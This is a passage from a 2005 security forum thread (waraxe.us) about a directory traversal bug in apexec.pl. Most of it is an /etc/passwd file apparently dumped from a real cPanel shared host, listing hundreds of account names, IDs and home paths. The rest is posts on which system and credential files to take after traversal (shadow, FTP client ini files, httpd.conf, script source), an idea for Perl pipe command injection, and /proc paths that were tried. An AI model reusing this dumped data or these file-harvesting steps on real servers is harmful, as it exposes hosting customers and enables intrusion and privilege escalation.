samorg:x:32291:32292::/home/samorg:/usr/local/cpanel/bin/noshell fastrak:x:32292:32293::/home/fastrak:/usr/local/cpanel/bin/noshell tziller:x:32397:32398::/home/tziller:/usr/local/cpanel/bin/noshell nassauco:x:32483:32503::/home/nassauco:/usr/local/cpanel/bin/noshell pinellas:x:32555:32556::/home/pinellas:/usr/local/cpanel/bin/noshell laauct:x:32476:32477::/home/laauct:/usr/local/cpanel/bin/noshell ocauct:x:32590:32591::/home/ocauct:/usr/local/cpanel/bin/noshell whyismys:x:32591:32592::/home/whyismys:/usr/local/cpanel/bin/noshell bodyc:x:32593:32594::/home/bodyc:/usr/local/cpanel/bin/noshell georgefr:x:32137:32137::/home/georgefr:/usr/local/cpanel/bin/noshell personal:x:32448:32449::/home/personal:/usr/local/cpanel/bin/noshell fastrakc:x:32594:32595::/home/fastrakc:/usr/local/cpanel/bin/noshell todd8771:x:32368:32369::/home/todd8771:/usr/local/cpanel/bin/noshell employ:x:32595:32596::/home/employ:/usr/local/cpanel/bin/noshell bnigo:x:32030:32030::/home/bnigo:/usr/local/cpanel/bin/noshell brooks:x:32596:32597::/home/brooks:/usr/local/cpanel/bin/noshell yoderkl:x:32597:32598::/home/yoderkl:/usr/local/cpanel/bin/noshell yoderden:x:32598:32599::/home/yoderden:/usr/local/cpanel/bin/noshell thebid:x:32599:32600::/home/thebid:/usr/local/cpanel/bin/noshell sarahbou:x:32600:32601::/home/sarahbou:/usr/local/cpanel/bin/noshell minnie:x:32601:32602::/home/minnie:/usr/local/cpanel/bin/noshell matthewe:x:32179:32179::/home/matthewe:/usr/local/cpanel/bin/noshell workcomp:x:32604:32605::/home/workcomp:/usr/local/cpanel/bin/noshell safe7:x:32606:32607::/home/safe7:/usr/local/cpanel/bin/noshell ebghost:x:32608:32609::/home/ebghost:/usr/local/cpanel/bin/noshell vertico:x:32025:32025::/home/vertico:/usr/local/cpanel/bin/noshell concenti:x:32408:32409::/home/concenti:/usr/local/cpanel/bin/noshell miami:x:32602:32603::/home/miami:/usr/local/cpanel/bin/noshell ericb:x:32610:32611::/home/ericb:/usr/local/cpanel/bin/noshell lerucher:x:32611:32612::/home/lerucher:/usr/local/cpanel/bin/noshell fuller:x:32612:32613::/home/fuller:/usr/local/cpanel/bin/noshell rotary69:x:32613:32614::/home/rotary69:/usr/local/cpanel/bin/noshell gostays:x:32614:32615::/home/gostays:/usr/local/cpanel/bin/noshell bodyjets:x:32621:32622::/home/bodyjets:/usr/local/cpanel/bin/noshell shawn:x:32603:32604::/home/shawn:/usr/local/cpanel/bin/noshell sgltax:x:32622:32623::/home/sgltax:/usr/local/cpanel/bin/noshell jhmhotel:x:32605:32606::/home/jhmhotel:/usr/local/cpanel/bin/noshell suelang:x:32623:32624::/home/suelang:/usr/local/cpanel/bin/noshell jdupre:x:32624:32625::/home/jdupre:/usr/local/cpanel/bin/noshell markkraa:x:32082:32082::/home/markkraa:/usr/local/cpanel/bin/noshell leon:x:32083:32083::/home/leon:/usr/local/cpanel/bin/noshell kelly:x:32003:32003::/home/kelly:/usr/local/cpanel/bin/noshell vinmanm:x:32004:32004::/home/vinmanm:/usr/local/cpanel/bin/noshell dunedinr:x:32007:32007::/home/dunedinr:/usr/local/cpanel/bin/noshell flanagan:x:32010:32010::/home/flanagan:/usr/local/cpanel/bin/noshell colemanl:x:32012:32012::/home/colemanl:/usr/local/cpanel/bin/noshell richardm:x:32014:32014::/home/richardm:/usr/local/cpanel/bin/noshell dunedins:x:32018:32018::/home/dunedins:/usr/local/cpanel/bin/noshell seafoodf:x:32019:32019::/home/seafoodf:/usr/local/cpanel/bin/noshell dougej:x:32020:32020::/home/dougej:/usr/local/cpanel/bin/noshell dbkbeta:x:32021:32021::/home/dbkbeta:/usr/local/cpanel/bin/noshell drafting:x:32023:32023::/home/drafting:/usr/local/cpanel/bin/noshell hillro00:x:32026:32026::/home/hillro00:/usr/local/cpanel/bin/noshell siggins:x:32017:32017::/home/siggins:/usr/local/cpanel/bin/noshell easyrefe:x:32028:32028::/home/easyrefe:/usr/local/cpanel/bin/noshell ernieo:x:32031:32031::/home/ernieo:/usr/local/cpanel/bin/noshell money10:x:32032:32032::/home/money10:/usr/local/cpanel/bin/noshell adsharp:x:32033:32033::/home/adsharp:/usr/local/cpanel/bin/noshell wifi7:x:32034:32034::/home/wifi7:/usr/local/cpanel/bin/noshell naxcom:x:32041:32041::/home/naxcom:/usr/local/cpanel/bin/noshell gailyork:x:32042:32042::/home/gailyork:/usr/local/cpanel/bin/noshell ghepburn:x:32043:32043::/home/ghepburn:/usr/local/cpanel/bin/noshell coolbus:x:32044:32044::/home/coolbus:/usr/local/cpanel/bin/noshell ibscllc:x:32045:32045::/home/ibscllc:/usr/local/cpanel/bin/noshell berlin:x:32046:32046::/home/berlin:/usr/local/cpanel/bin/noshell pinachio:x:32049:32049::/home/pinachio:/usr/local/cpanel/bin/noshell kevin:x:32050:32050::/home/kevin:/usr/local/cpanel/bin/noshell celiawm:x:32051:32051::/home/celiawm:/usr/local/cpanel/bin/noshell vipwine:x:32052:32052::/home/vipwine:/usr/local/cpanel/bin/noshell ymw:x:32053:32053::/home/ymw:/usr/local/cpanel/bin/noshell carsonpe:x:32054:32054::/home/carsonpe:/usr/local/cpanel/bin/noshell refriger:x:32055:32055::/home/refriger:/usr/local/cpanel/bin/noshell kettle:x:32056:32056::/home/kettle:/usr/local/cpanel/bin/noshell nonino:x:32060:32060::/home/nonino:/usr/local/cpanel/bin/noshell motion:x:32066:32066::/home/motion:/usr/local/cpanel/bin/noshell shedali:x:32067:32067::/home/shedali:/usr/local/cpanel/bin/noshell alexcb40:x:32070:32070::/home/alexcb40:/usr/local/cpanel/bin/noshell butler:x:32071:32071::/home/butler:/usr/local/cpanel/bin/noshell umhcnet:x:32072:32072::/home/umhcnet:/usr/local/cpanel/bin/noshell cpatafio:x:32073:32073::/home/cpatafio:/usr/local/cpanel/bin/noshell hawaiisp:x:32075:32075::/home/hawaiisp:/usr/local/cpanel/bin/noshell creative:x:32076:32076::/home/creative:/usr/local/cpanel/bin/noshell viewpoin:x:32078:32078::/home/viewpoin:/usr/local/cpanel/bin/noshell kauaifil:x:32079:32079::/home/kauaifil:/usr/local/cpanel/bin/noshell malulnet:x:32085:32085::/home/malulnet:/usr/local/cpanel/bin/noshell mffftpc:x:32086:32086::/home/mffftpc:/usr/local/cpanel/bin/noshell mikecarr:x:32090:32090::/home/mikecarr:/usr/local/cpanel/bin/noshell stellari:x:32094:32094::/home/stellari:/usr/local/cpanel/bin/noshell hpremier:x:32097:32097::/home/hpremier:/usr/local/cpanel/bin/noshell advanta:x:32098:32098::/home/advanta:/usr/local/cpanel/bin/noshell advlend:x:32101:32101::/home/advlend:/usr/local/cpanel/bin/noshell teenpage:x:32059:32059::/home/teenpage:/usr/local/cpanel/bin/noshell hsbuy04:x:32102:32102::/home/hsbuy04:/usr/local/cpanel/bin/noshell badnewz:x:32104:32104::/home/badnewz:/usr/local/cpanel/bin/noshell ander04:x:32106:32106::/home/ander04:/usr/local/cpanel/bin/noshell multinet:x:32108:32108::/home/multinet:/usr/local/cpanel/bin/noshell patrickm:x:32096:32096::/home/patrickm:/usr/local/cpanel/bin/noshell rivers2t:x:32109:32109::/home/rivers2t:/usr/local/cpanel/bin/noshell riversto:x:32111:32111::/home/riversto:/usr/local/cpanel/bin/noshell sculptur:x:32130:32130::/home/sculptur:/usr/local/cpanel/bin/noshell dream:x:32087:32087::/home/dream:/usr/local/cpanel/bin/noshell natill:x:32088:32088::/home/natill:/usr/local/cpanel/bin/noshell discount:x:32095:32095::/home/discount:/usr/local/cpanel/bin/noshell dunedint:x:32151:32151::/home/dunedint:/usr/local/cpanel/bin/noshell grandvis:x:32162:32162::/home/grandvis:/usr/local/cpanel/bin/noshell ohiowre:x:32167:32167::/home/ohiowre:/usr/local/cpanel/bin/noshell deborahn:x:32173:32173::/home/deborahn:/usr/local/cpanel/bin/noshell wd2host:x:32182:32182::/home/wd2host:/usr/local/cpanel/bin/noshell etscorn:x:32189:32189::/home/etscorn:/usr/local/cpanel/bin/noshell kelietem:x:32285:32286::/home/kelietem:/usr/local/cpanel/bin/noshell dbkmedia:x:32286:32287::/home/dbkmedia:/usr/local/cpanel/bin/noshell losedog:x:32013:32013::/home/losedog:/usr/local/cpanel/bin/noshell longcast:x:32288:32289::/home/longcast:/usr/local/cpanel/bin/noshell clay:x:32038:32038::/home/clay:/usr/local/cpanel/bin/noshell nola:x:32112:32112::/home/nola:/usr/local/cpanel/bin/noshell vanbaare:x:32178:32178::/home/vanbaare:/usr/local/cpanel/bin/noshell ahawaiiv:x:32293:32294::/home/ahawaiiv:/usr/local/cpanel/bin/noshell rwbadges:x:32302:32303::/home/rwbadges:/usr/local/cpanel/bin/noshell rromanow:x:32172:32172::/home/rromanow:/usr/local/cpanel/bin/noshell hallofs:x:32304:32305::/home/hallofs:/usr/local/cpanel/bin/noshell agrumia:x:32146:32146::/home/agrumia:/usr/local/cpanel/bin/noshell wolitzer:x:32306:32307::/home/wolitzer:/usr/local/cpanel/bin/noshell hrreloca:x:32318:32319::/home/hrreloca:/usr/local/cpanel/bin/noshell columbia:x:32027:32027::/home/columbia:/usr/local/cpanel/bin/noshell serveray:x:32009:32009::/home/serveray:/usr/local/cpanel/bin/noshell azmerch:x:32080:32080::/home/azmerch:/usr/local/cpanel/bin/noshell azpunk:x:32089:32089::/home/azpunk:/usr/local/cpanel/bin/noshell murphybu:x:32308:32309::/home/murphybu:/usr/local/cpanel/bin/noshell pasadena:x:32322:32323::/home/pasadena:/usr/local/cpanel/bin/noshell mary5:x:32057:32057::/home/mary5:/usr/local/cpanel/bin/noshell longinfo:x:32058:32058::/home/longinfo:/usr/local/cpanel/bin/noshell runnings:x:32069:32069::/home/runnings:/usr/local/cpanel/bin/noshell west5:x:32174:32174::/home/west5:/usr/local/cpanel/bin/noshell agmgr:x:32290:32291::/home/agmgr:/usr/local/cpanel/bin/noshell american:x:32323:32324::/home/american:/usr/local/cpanel/bin/noshell dmt:x:32324:32325::/home/dmt:/usr/local/cpanel/bin/noshell carrier:x:32331:32332::/home/carrier:/usr/local/cpanel/bin/noshell carnet:x:32332:32333::/home/carnet:/usr/local/cpanel/bin/noshell carms:x:32375:32376::/home/carms:/usr/local/cpanel/bin/noshell azdream:x:32409:32410::/home/azdream:/usr/local/cpanel/bin/noshell catastro:x:32068:32068::/home/catastro:/usr/local/cpanel/bin/noshell antiterr:x:32412:32413::/home/antiterr:/usr/local/cpanel/bin/noshell unitedst:x:32418:32419::/home/unitedst:/usr/local/cpanel/bin/noshell roadrunr:x:32428:32429::/home/roadrunr:/usr/local/cpanel/bin/noshell bware:x:32437:32438::/home/bware:/usr/local/cpanel/bin/noshell steve5:x:32438:32439::/home/steve5:/usr/local/cpanel/bin/noshell freeborn:x:32440:32441::/home/freeborn:/usr/local/cpanel/bin/noshell primeint:x:32441:32442::/home/primeint:/usr/local/cpanel/bin/noshell kepsbeau:x:32450:32451::/home/kepsbeau:/usr/local/cpanel/bin/noshell shedal:x:32463:32464::/home/shedal:/usr/local/cpanel/bin/noshell wellspri:x:32477:32478::/home/wellspri:/usr/local/cpanel/bin/noshell iknowgee:x:32489:32490::/home/iknowgee:/usr/local/cpanel/bin/noshell botefco:x:32499:32500::/home/botefco:/usr/local/cpanel/bin/noshell devray:x:32485:32486::/home/devray:/usr/local/cpanel/bin/noshell shaktije:x:32091:32091::/home/shaktije:/usr/local/cpanel/bin/noshell malula4:x:32081:32081::/home/malula4:/usr/local/cpanel/bin/noshell mbwhost:x:32505:32506::/home/mbwhost:/usr/local/cpanel/bin/noshell thunderb:x:32508:32509::/home/thunderb:/usr/local/cpanel/bin/noshell mentors5:x:32314:32315::/home/mentors5:/usr/local/cpanel/bin/noshell lakeerie:x:32107:32107::/home/lakeerie:/usr/local/cpanel/bin/noshell admin:x:32005:32005::/home/admin:/usr/local/cpanel/bin/noshell africanc:x:32127:32127::/home/africanc:/usr/local/cpanel/bin/noshell hostingo:x:32523:32524::/home/hostingo:/usr/local/cpanel/bin/noshell adsharpt:x:32524:32525::/home/adsharpt:/usr/local/cpanel/bin/noshell webaico:x:32570:32579::/home/webaico:/usr/local/cpanel/bin/noshell ocktob:x:32578:32580::/home/ocktob:/usr/local/cpanel/bin/noshell arcangel:x:32016:32016::/home/arcangel:/usr/local/cpanel/bin/noshell abroadad:x:32029:32029::/home/abroadad:/usr/local/cpanel/bin/noshell susan:x:32084:32084::/home/susan:/usr/local/cpanel/bin/noshell deluca:x:32169:32169::/home/deluca:/usr/local/cpanel/bin/noshell jim:x:32200:32200::/home/jim:/usr/local/cpanel/bin/noshell tampabay:x:32047:32047::/home/tampabay:/usr/local/cpanel/bin/noshell bios:x:32024:32024::/home/bios:/usr/local/cpanel/bin/noshell kenmarco:x:32040:32040::/home/kenmarco:/usr/local/cpanel/bin/noshell sscollie:x:32077:32077::/home/sscollie:/usr/local/cpanel/bin/noshell moldd:x:32100:32100::/home/moldd:/usr/local/cpanel/bin/noshell hillsber:x:32103:32103::/home/hillsber:/usr/local/cpanel/bin/noshell dreampoo:x:32105:32105::/home/dreampoo:/usr/local/cpanel/bin/noshell escher:x:32113:32113::/home/escher:/usr/local/cpanel/bin/noshell naslemm:x:32035:32035::/home/naslemm:/usr/local/cpanel/bin/noshell molddogi:x:32114:32114::/home/molddogi:/usr/local/cpanel/bin/noshell missfull:x:32115:32115::/home/missfull:/usr/local/cpanel/bin/noshell helicals:x:32116:32116::/home/helicals:/usr/local/cpanel/bin/noshell pierrejo:x:32117:32117::/home/pierrejo:/usr/local/cpanel/bin/noshell ems:x:32118:32118::/home/ems:/usr/local/cpanel/bin/noshell fileon:x:32119:32119::/home/fileon:/usr/local/cpanel/bin/noshell rabers:x:32120:32120::/home/rabers:/usr/local/cpanel/bin/noshell loverz:x:32121:32121::/home/loverz:/usr/local/cpanel/bin/noshell pph:x:32122:32122::/home/pph:/usr/local/cpanel/bin/noshell app:x:32124:32124::/home/app:/usr/local/cpanel/bin/noshell inmemory:x:32125:32125::/home/inmemory:/usr/local/cpanel/bin/noshell dwash05:x:32126:32126::/home/dwash05:/usr/local/cpanel/bin/noshell mauibeac:x:32128:32128::/home/mauibeac:/usr/local/cpanel/bin/noshell juliesca:x:32129:32129::/home/juliesca:/usr/local/cpanel/bin/noshell pieceof:x:32131:32131::/home/pieceof:/usr/local/cpanel/bin/noshell johnny:x:32132:32132::/home/johnny:/usr/local/cpanel/bin/noshell yourpriv:x:32133:32133::/home/yourpriv:/usr/local/cpanel/bin/noshell coaching:x:32134:32134::/home/coaching:/usr/local/cpanel/bin/noshell asummerh:x:32022:32022::/home/asummerh:/usr/local/cpanel/bin/noshell adamagre:x:32135:32135::/home/adamagre:/usr/local/cpanel/bin/noshell tour:x:32136:32136::/home/tour:/usr/local/cpanel/bin/noshell lynniema:x:32138:32138::/home/lynniema:/usr/local/cpanel/bin/noshell lynniemm:x:32139:32139::/home/lynniemm:/usr/local/cpanel/bin/n


Cool
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Apr 20, 2005 1:42 pm Reply with quote
y3dips
Valuable expert
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




just wondering , if u found the directroy traversal.. what file are the most you looking for waraxe?

except the passwd, shadow(????? Evil or Very Mad ) also the config

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Wed Apr 20, 2005 2:12 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




y3dips wrote:
just wondering , if u found the directroy traversal.. what file are the most you looking for waraxe?

except the passwd, shadow(????? Evil or Very Mad ) also the config


It will depend on specific situation. If server is windows server, then ws_ftp.ini and other ftp clients ini-files, registry files (if they are accesible). And of course, because i am addicted to bugs in scripts (php,perl,asp), then i want to look at source code of all the scripts in server, and this can give me many new directions to privilege level escalation Very Happy
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Apr 20, 2005 2:24 pm Reply with quote
y3dips
Valuable expert
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




waraxe wrote:

It will depend on specific situation. If server is windows server, then ws_ftp.ini and other ftp clients ini-files, registry files (if they are accesible). And of course, because i am addicted to bugs in scripts (php,perl,asp), then i want to look at source code of all the scripts in server, and this can give me many new directions to privilege level escalation Very Happy


Aggree with you,
maybe some more exploring time will give much info

php.ini n httpd.conf also Smile

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Wed Apr 20, 2005 3:38 pm Reply with quote
erg0t
Valuable expert
Valuable expert
Joined: Apr 08, 2005
Posts: 55
Location: Uruguay




Something came to my mind when I saw this vuln.
Perl have a funcion open, where you can especify the mode of opening in the same string. I was wondering if in this bug open is used (I yet don?t see the code), so in this case, we could try to use "|" to execute commands.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Apr 20, 2005 4:52 pm Reply with quote
erg0t
Valuable expert
Valuable expert
Joined: Apr 08, 2005
Posts: 55
Location: Uruguay




Well, i made some tests and seems that can?t execute nothing Sad
However good info can be readed from proc, and I made some tests with dev, and in the dispositives I have permission to read it hangs Sad
some tries were: /dev/urandom
/dev/random
/dev/console
/proc/cpuinfo
/proc/meminfo
/proc/version
/proc/1/status
View user's profile Send private message Send e-mail Visit poster's website
Directoy Traversal Attack in apexec.pl (.%00./-Bug)
www.waraxe.us Forum Index -> Perl
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.050 Seconds